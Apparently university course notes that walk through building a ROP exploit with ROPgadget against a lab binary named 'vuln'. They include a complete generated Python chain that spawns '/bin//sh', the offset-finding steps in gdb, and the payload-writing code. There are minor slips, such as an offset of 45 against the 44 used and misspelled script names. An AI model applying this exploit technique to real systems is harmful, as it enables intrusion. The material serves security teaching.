COMSM0049

Lets say you have a binary called vuln and you want to create a rop based exploit using ROPGadget. This binary takes a file as input.

  1. Run:

     ./ROPgadget.py --binary vuln --ropchain > out-rop.txt
    
  2. Open out-rop.txt (it will be a huge file, normally) and will contain lot of instructions (gadgets)
  3. Scroll down to the end when you see:

     ROP chain generation
         =================================================
    
  4. If ROPgadget finds a chain for you, you will see information below that point. Read the information for your understanding.
  5. There should be a line starting with “Step 5 – Build the ROP chain”. Whatever is below that line, copy that into a separate file and name is as, for example, exploit.py. So the content of the expoit.py should be:

         \#!/usr/bin/env python2
         \# execve generated by ROPgadget
         from struct import pack
         \# Padding goes here
         p = ''
         p += pack('<I', 0x0806ee8b) # pop edx ; ret
         p += pack('<I', 0x080da060) # @ .data
         p += pack('<I', 0x080a8bf6) # pop eax ; ret
         p += '/bin'
         p += pack('<I', 0x08056d05) # mov dword ptr [edx], eax ; ret
         p += pack('<I', 0x0806ee8b) # pop edx ; ret
         p += pack('<I', 0x080da064) # @ .data + 4
         p += pack('<I', 0x080a8bf6) # pop eax ; ret
         p += '//sh'
         p += pack('<I', 0x08056d05) # mov dword ptr [edx], eax ; ret
         p += pack('<I', 0x0806ee8b) # pop edx ; ret
         p += pack('<I', 0x080da068) # @ .data + 8
         p += pack('<I', 0x080562c0) # xor eax, eax ; ret
         p += pack('<I', 0x08056d05) # mov dword ptr [edx], eax ; ret
         p += pack('<I', 0x080481c9) # pop ebx ; ret
         p += pack('<I', 0x080da060) # @ .data
         p += pack('<I', 0x0806eeb2) # pop ecx ; pop ebx ; ret
         p += pack('<I', 0x080da068) # @ .data + 8
         p += pack('<I', 0x080da060) # padding without overwrite ebx
         p += pack('<I', 0x0806ee8b) # pop edx ; ret
         p += pack('<I', 0x080da068) # @ .data + 8
         p += pack('<I', 0x080562c0) # xor eax, eax ; ret
         p += pack('<I', 0x0807c32a) # inc eax ; ret
         p += pack('<I', 0x0807c32a) # inc eax ; ret
         p += pack('<I', 0x0807c32a) # inc eax ; ret
         p += pack('<I', 0x0807c32a) # inc eax ; ret
         p += pack('<I', 0x0807c32a) # inc eax ; ret
         p += pack('<I', 0x0807c32a) # inc eax ; ret
         p += pack('<I', 0x0807c32a) # inc eax ; ret
         p += pack('<I', 0x0807c32a) # inc eax ; ret
         p += pack('<I', 0x0807c32a) # inc eax ; ret
         p += pack('<I', 0x0807c32a) # inc eax ; ret
         p += pack('<I', 0x0807c32a) # inc eax ; ret
         p += pack('<I', 0x08049603) # int 0x80
    
  6. Now, create another text file test.txt with the following content: AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNN

  7. Run gdb vuln and when in gdb, r test.txt
  8. you will see a sigsegv, leading to a crash with the msg:

     Program received signal SIGSEGV, Segmentation fault.
     0x4c4c4c4c in ?? ()
    
  9. If you notice 4c is ascii for L, which means 11x4=44 characters are needed to overwrite the saved return address on the stack (look at the test.txt contents LLLL offset is 45!).
  10. Open exploit.py and edit the following line:

        # Padding goes here
        p = 'A'*44 # this is where we appended 44 characters.
    
  11. Add the following lines at the end of exploit.py:

    fileName=raw_input("Enter the file name")
    outfile=open(fileName, "wb")
    outfile.write(p)
    outfile.close()
    
  12. Now run python explot.py. It will ask for a file name: enter rop.bin
  13. Finally run:

        vuln rop.bin
    
  14. If everything goes fine, you will see a different command-prompt. Done!